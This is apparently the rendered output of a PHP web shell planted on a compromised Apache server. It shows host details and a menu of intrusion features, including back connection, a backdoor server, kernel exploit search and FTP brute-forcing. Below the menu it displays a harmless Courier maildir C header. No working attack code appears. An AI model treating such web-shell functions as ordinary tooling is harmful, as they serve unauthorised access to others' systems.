|
System | : | Linux MiraNet 3.0.0-14-generic-pae #23-Ubuntu SMP Mon Nov 21 22:07:10 UTC 2011 i686 |
Software | : | Apache. PHP/5.3.6-13ubuntu3.10 |
ID | : | uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
|
|
Safe Mode | : | OFF |
Open_Basedir | : | OFF |
Freespace | : | 23.66 GB of 70.42 GB (33.61%) |
|
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON |
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
|
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ]
|
|
/
usr/
src/
courier-0.66.1/
maildir/
- drwxrwxrwx
|
Viewing file: maildircreate.h (1.15 KB) -rw-rw-rw-Select action/file-type:  ( +) |  ( +) |  ( +) | Code ( +) | Session ( +) |  ( +) | SDB ( +) |  ( +) |  ( +) |  ( +) |  ( +) |  ( +) |
#ifndef maildircreate_h #define maildircreate_h
/* ** Copyright 1998 - 2003 Double Precision, Inc. ** See COPYING for distribution information. */
#if HAVE_CONFIG_H #include "config.h" #endif
#include <stdio.h>
#ifdef __cplusplus extern "C" { #endif
/* Create messages in maildirs */
struct maildir_tmpcreate_info { const char *maildir; unsigned long msgsize; /* If known, 0 otherwise (must use requota later)*/ const char *uniq; /* You need when creating multiple msgs */ const char *hostname; /* If known, NULL otherwise */ int openmode; /* Default open mode */ int doordie; /* Loop until we get it right. */ char *tmpname; /* On exit, filename in tmp */ char *newname; /* On exit, filename in new */ };
#define maildir_tmpcreate_init(i) \ do \ { \ memset( (i), 0, sizeof(*(i))); \ (i)->openmode=0644; \ } while(0)
int maildir_tmpcreate_fd(struct maildir_tmpcreate_info *); FILE *maildir_tmpcreate_fp(struct maildir_tmpcreate_info *); void maildir_tmpcreate_free(struct maildir_tmpcreate_info *);
/* Move created message from tmp to new */ int maildir_movetmpnew(const char *tmpname, const char *newname);
#ifdef __cplusplus } #endif
#endif
|